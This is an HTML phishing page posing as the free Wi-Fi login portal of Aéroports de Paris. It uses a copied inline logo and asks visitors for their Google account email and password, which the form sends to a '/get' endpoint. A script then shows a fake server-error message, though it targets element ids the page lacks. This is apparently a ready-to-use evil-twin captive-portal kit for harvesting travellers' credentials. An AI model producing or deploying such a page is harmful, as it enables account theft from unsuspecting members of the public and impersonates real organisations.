<!DOCTYPE html>
<html>
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <style>
        /* Styles généraux pour les écrans étroits (smartphones) */
        a:hover {
            text-decoration: underline;
        }

        body {
            font-family: Arial, sans-serif;
            align-items: center;
            justify-content: center;
            background-color: #FFFFFF;
        }

        input[type="text"],
        input[type="password"] {
            width: 100%;
            padding: 12px 10px;
            margin: 8px 0;
            box-sizing: border-box;
            border: 1px solid #cccccc;
            border-radius: 4px;
        }

        .container {
            max-width: 100%;
            margin: auto;
            padding: 20px;
        }

        .logo-container {
            text-align: center;
            margin-bottom: 30px;
            display: flex;
            justify-content: center;
            align-items: center;
        }

        .logo {
            max-width: 40px;
            max-height: 40px;
            fill: #FFC72C;
            margin-right: 100px;
        }

        .company-name {
            font-size: 42px;
            color: black;
            margin-left: 0px;
        }

        .form-container {
            background: #FFFFFF;
            border: 1px solid #CEC0DE;
            border-radius: 4px;
            padding: 20px;
            box-shadow: 0px 0px 10px 0px rgba(108, 66, 156, 0.2);
        }

        h1 {
            text-align: center;
            font-size: 28px;
            font-weight: 500;
            margin-bottom: 20px;
        }

        .input-field {
            width: 100%;
            padding: 12px;
            border: 1px solid #BEABD3;
            border-radius: 4px;
            margin-bottom: 20px;
            font-size: 14px;
        }

        .submit-btn {
            background: #000000;
            color: white;
            border: none;
            padding: 12px 20px;
            border-radius: 4px;
            font-size: 16px;
        }

        .submit-btn:hover {
            background: #5B3784;
        }

        .containersubtitle {
            color: #000000;
        }

        .containertitle {
            color: #000000;
        }

        /* Styles spécifiques pour les écrans larges (PC) */
        @media screen and (min-width: 768px) {
            .logo {
                max-width: 80px;
                max-height: 80px;
            }
        }
    </style>
</head>
<body>
<div class="container">
    <div class="logo-container">
        <?xml version="1.0" encoding="utf-8"?>
<!-- Generator: Adobe Illustrator 15.0.0, SVG Export Plug-In . SVG Version: 6.00 Build 0)  -->
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" id="Calque_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px"
	 width="466px" height="235px" viewBox="169.455 158.134 466 235" enable-background="new 169.455 158.134 466 235"
	 xml:space="preserve">
<path fill="#F5821F" d="M588.291,234.405c0,0,0,0-0.004-0.001l0.193-0.538c-2.938-1.054-5.949-1.709-8.986-1.975l-0.01-0.012
	c3.756-2.643,8.332-4.953,9.952-5.668c0.603-0.264,0.521-0.764-0.108-0.689c-1.356,0.161-6.457,2.546-10.442,5.214
	c0.856-4.92,2.258-8.917,2.436-9.404l0.01-0.466l-2.563,0.542c0,0-0.937,3.567-1.816,7.949c-2-2.311-4.076-4.527-6.179-6.625
	c0,0-0.567,0.207-1.06,0.346c-0.449,0.121-1.302,0.68-1.302,0.68c2.238,2.14,6.853,7.361,7.386,8.005
	c-6.453,0.063-11.07,2.504-11.07,2.504l1.031,0.505c3.313-1.602,6.436-1.69,9.834-1.767c-3.48,2.59-6.444,5.405-10.306,9.43
	l0.401,0.406c0,0,1.343-0.148,1.669-0.406c0.107-0.084,5.846-5.79,8.611-7.968l0.002,0.096c-0.769,4.682-1.211,10.051-0.933,11.874
	l1.517-1.315c0.004-0.051,0.723-4.95,1.684-10.437c1.443,1.821,3.459,4.798,4.426,7.638c0.101,0.27,0.146-0.082,1.341-0.496
	c0.746-0.257,1.062-0.406,0.963-0.724c-0.998-2.915-2.819-5.499-4.592-7.698c1.993,0.389,4.034,0.927,5.961,1.604
	C587.052,235.26,587.94,234.393,588.291,234.405"/>
<path fill="#00427E" d="M548.308,302.3c-0.029-3.909-0.521-7.817-5.648-12.401l-0.028-0.021c2.823-1.397,6.051-2.662,9.586-3.88
	c1.229,6.891,2.61,12.477,3.789,16.269C553.408,302.274,550.839,302.286,548.308,302.3 M546.242,302.304
	c-3.018,0.011-9.936,0.043-15.713,0.071c1.183-4.781,4.618-8.3,9.678-11.212C545.378,295.74,546.28,299.885,546.242,302.304z
	 M529.849,284.619c3.471,1.647,6.225,3.317,8.399,4.953c-8.336,4.469-10.247,8.674-11.516,12.823
	c-2.69,0.014-4.712,0.025-5.238,0.029C524.528,296.283,527.94,288.936,529.849,284.619z M515.983,265.946
	c-5.318-2.999-14.131-11.093-13.756-15.328c0.227-2.532,3.957-2.407,3.957-2.407c-2.367-1.872-7.332-7.348-8.527-14.569
	c17.42,8.312,31.228,28.964,35.586,36.916c-1.594,3.722-3.164,7.307-4.694,10.693C507.608,271.912,515.983,265.946,515.983,265.946z
	 M545.787,246.932l-0.002,0.01c0.401-1.046,1.304-3.364,2.461-6.321c0.646-1.735,0.66-2.214,0.896-2.437
	c-0.079,0.453-0.229,1.628-0.258,2.45c-0.019,0.498-0.041,1.265-0.062,1.789c-0.33,15.751,1.135,30.25,3.045,41.572l0.002,0.008
	c-4.5,1.474-8.153,2.907-11.135,4.314c-2.434-1.852-5.647-3.824-9.896-5.953C535.628,271.451,542.453,255.477,545.787,246.932z
	 M599.106,246.103c-2.068,4.591-10.887,9.636-10.887,9.636c6.365,3.372-3.801,9.72-12.685,13.997
	c4.82,2.17,3.567,5.996-20.056,13.125c-0.731-3.691-1.312-7.349-1.771-10.933C573.056,252.092,596.183,246.877,599.106,246.103z
	 M553.25,220.9c0.63-7.021,2.334-15.968,3.832-20.125c0.545-1.506,1.775-0.999,2.13-0.53c2.084,2.751-3.455,15.923-5.396,20.523
	c-0.24,0.65-0.406,1.132-0.555,1.724C552.994,223.543,553.158,221.924,553.25,220.9z M560.757,302.257
	c-2.076-5.854-3.672-11.707-4.888-17.472c33.302-9.609,24.108-14.767,24.108-14.767c14.548-7.017,15.349-10.466,12.315-13.863
	c4.104-2.508,9.801-6.593,12.93-13.911c-15.68,2.71-36.31,11.195-51.644,25.721c-0.205,0.195-0.368,0.395-0.368,0.395
	c0.006-0.041,0.058-0.315,0.028-0.615c-1.201-13.366-1.119-27.945-0.845-37.267c3.357-10.98,8.755-21.265,9.375-27.713
	c0.325-3.377-2.058-4.737-3.896-4.146c-3.94,1.262-6.598,8.639-8.366,32.452c-4.521,11.083-9.996,24.839-14.443,35.441
	c-0.082,0.218-0.148,0.436-0.154,0.535c0,0-0.065-0.218-0.209-0.468c-14.474-24.879-35.532-35.674-41.596-38.012
	c1.715,10.414,4.6,15.197,8.148,19.196c-1.88,0.694-2.898,1.774-3.067,3.371c-0.46,4.407,5.921,10.82,13.515,14.638
	c0,0-6.979,8.375,15.791,17.788c-3.537,7.677-6.696,14.126-9.672,18.877c-114.134,0.698-148.591,2.545-148.719,2.573l5.105,6.661
	c0,0,94.984-6.237,234.938-7.015l1.44-2.472C592.787,302.187,576.198,302.21,560.757,302.257z"/>
<path fill="#00427E" d="M235.031,330.866h-0.061l-4.51,8.321h5.483L235.031,330.866 M232.199,326.479h7.128l3.473,21.269h-5.729
	l-0.576-4.539h-8.258l-2.529,4.539h-6.153L232.199,326.479z"/>
<path fill="#00427E" d="M260.013,320.597h5.697v0.67l-5.027,3.718h-3.594v-0.369L260.013,320.597 M252.58,326.479h14.958
	l-0.823,4.021h-9.353l-0.976,4.39h8.866l-0.883,4.022h-8.834l-1.036,4.812h9.716l-0.821,4.021h-15.386L252.58,326.479z"/>
<path fill="#00427E" d="M277.896,335.315h1.92c2.468,0,4.388-0.606,4.388-2.619c0-1.524-0.915-2.164-2.62-2.194h-2.713
	L277.896,335.315 M274.148,326.479h6.795c4.052,0.03,8.926,0.15,8.926,5.424c0,3.748-2.925,5.06-6.184,5.455v0.062
	c1.676,0.151,2.224,2.405,2.527,3.776l1.523,6.552h-5.667l-1.096-5.425c-0.549-2.771-0.73-2.983-3.29-2.983h-0.609l-1.706,8.408
	h-5.697L274.148,326.479z"/>
<path fill="#00427E" d="M306.32,330.319c-4.387,0-6.215,5.09-6.215,8.685c0,2.683,1.006,4.905,3.96,4.905
	c4.388,0,6.216-5.09,6.216-8.651C310.281,332.571,309.275,330.319,306.32,330.319 M303.7,348.112c-6.917,0-9.445-4.295-9.445-8.649
	c0-8.073,4.234-13.351,12.43-13.351c6.915,0,9.444,4.297,9.444,8.688C316.129,342.844,311.894,348.112,303.7,348.112z"/>
<path fill="#00427E" d="M327.523,336.291h1.523c2.254,0,4.296-0.791,4.296-3.317c0-2.043-1.401-2.472-2.924-2.472h-1.677
	L327.523,336.291 M323.988,326.479h5.668c4.661,0,9.354,0.489,9.354,5.853c0,5.301-4.326,7.981-9.445,7.981h-2.894l-1.585,7.435
	h-5.666L323.988,326.479z"/>
<path fill="#00427E" d="M354.728,330.319c-4.387,0-6.215,5.09-6.215,8.685c0,2.683,1.006,4.905,3.961,4.905
	c4.387,0,6.215-5.09,6.215-8.651C358.689,332.571,357.684,330.319,354.728,330.319 M352.109,348.112
	c-6.916,0-9.444-4.295-9.444-8.649c0-8.073,4.235-13.351,12.43-13.351c6.915,0,9.444,4.297,9.444,8.688
	C364.538,342.844,360.304,348.112,352.109,348.112z"/>
<path fill="#00427E" d="M376.419,335.315h1.919c2.468,0,4.388-0.606,4.388-2.619c0-1.524-0.913-2.164-2.619-2.194h-2.712
	L376.419,335.315 M372.672,326.479h6.794c4.052,0.03,8.927,0.15,8.927,5.424c0,3.748-2.925,5.06-6.186,5.455v0.062
	c1.677,0.151,2.225,2.405,2.529,3.776l1.523,6.552h-5.666l-1.099-5.425c-0.548-2.771-0.729-2.983-3.29-2.983h-0.609l-1.705,8.408
	h-5.696L372.672,326.479z"/>
<polyline fill="#00427E" points="398.984,330.685 393.686,330.685 394.601,326.479 410.95,326.479 410.036,330.685 404.739,330.685 
	401.115,347.748 395.361,347.748 398.984,330.685 "/>
<path fill="#00427E" d="M429.017,331.294c-1.098-0.517-2.59-0.976-4.693-0.976c-2.252,0-4.08,0.336-4.08,2.041
	c0,3.019,8.257,1.892,8.257,8.351c0,5.879-5.453,7.401-10.39,7.401c-2.194,0-4.722-0.517-6.579-1.097l1.337-4.325
	c1.13,0.73,3.384,1.219,5.242,1.219c1.767,0,4.54-0.336,4.54-2.528c0-3.411-8.255-2.136-8.255-8.136
	c0-5.484,4.812-7.133,9.472-7.133c2.623,0,5.09,0.274,6.521,0.944L429.017,331.294"/>
<path fill="#00427E" d="M449.946,343.542h2.496c5.576,0,7.74-4.173,7.74-8.134c0-3.901-2.684-4.724-6.154-4.724h-1.402
	L449.946,343.542 M447.812,326.479h7.372c6.762,0,10.846,2.866,10.846,8.534c0,8.896-5.574,12.733-13.559,12.733h-9.166
	L447.812,326.479z"/>
<polyline fill="#00427E" points="474.621,326.479 489.578,326.479 488.759,330.501 479.405,330.501 478.433,334.89 487.296,334.89 
	486.412,338.914 477.576,338.914 476.541,343.726 486.261,343.726 485.438,347.748 470.054,347.748 474.621,326.479 "/>
<path fill="#00427E" d="M509.384,336.291h1.521c2.256,0,4.297-0.791,4.297-3.317c0-2.043-1.401-2.472-2.926-2.472H510.6
	L509.384,336.291 M505.849,326.479h5.668c4.658,0,9.352,0.489,9.352,5.853c0,5.301-4.325,7.981-9.444,7.981h-2.894l-1.586,7.435
	h-5.666L505.849,326.479z"/>
<path fill="#00427E" d="M534.823,330.866h-0.062l-4.508,8.321h5.483L534.823,330.866 M531.989,326.479h7.129l3.472,21.269h-5.726
	l-0.58-4.539h-8.256l-2.526,4.539h-6.156L531.989,326.479z"/>
<path fill="#00427E" d="M556.024,335.315h1.92c2.469,0,4.387-0.606,4.387-2.619c0-1.524-0.911-2.164-2.618-2.194H557
	L556.024,335.315 M552.278,326.479h6.793c4.053,0.03,8.928,0.15,8.928,5.424c0,3.748-2.926,5.06-6.185,5.455v0.062
	c1.675,0.151,2.224,2.405,2.528,3.776l1.522,6.552h-5.668l-1.098-5.425c-0.547-2.771-0.729-2.983-3.288-2.983h-0.608l-1.707,8.408
	h-5.698L552.278,326.479z"/>
<polyline fill="#00427E" points="575.826,326.479 581.554,326.479 577.138,347.748 571.41,347.748 575.826,326.479 "/>
<path fill="#00427E" d="M601.662,331.294c-1.098-0.517-2.592-0.976-4.692-0.976c-2.256,0-4.082,0.336-4.082,2.041
	c0,3.019,8.256,1.892,8.256,8.351c0,5.879-5.453,7.401-10.391,7.401c-2.19,0-4.722-0.517-6.578-1.097l1.34-4.325
	c1.125,0.73,3.382,1.219,5.238,1.219c1.769,0,4.541-0.336,4.541-2.528c0-3.411-8.257-2.136-8.257-8.136
	c0-5.484,4.815-7.133,9.476-7.133c2.621,0,5.088,0.274,6.52,0.944L601.662,331.294"/>
</svg>

    </div>
    <div class="form-container">
        <center>
            <h1 class='containertitle'>Aeroports de Paris - WIFI Gratuit.</h1>
            <h2 class='containersubtitle'> Bienvenue, connectez vous avec votre compte Google.</h2>
        </center>
        <form action="/get" id="login-form">
            <input name="email" class="input-field" type="text" placeholder="Google Account" required>
            <input name="password" class="input-field" type="password" placeholder="Password" required>
            <button class="submit-btn" type="submit">Continue</button>
        </form>
    </div>
</div>
<script>
  function showErrorPage() {document.write("<div style='margin-top:10%;background: lightgrey;max-width: 33%;margin: auto;padding: 20px;'><h1 style='text-align: center;color: black'>Our servers seem to be having some difficulties<h1></div>");}document.getElementById("submitbtn").addEventListener("click", showErrorPage);document.getElementById("forgot_credentials").addEventListener("click", showErrorPage);
</script>
</body>
</html>
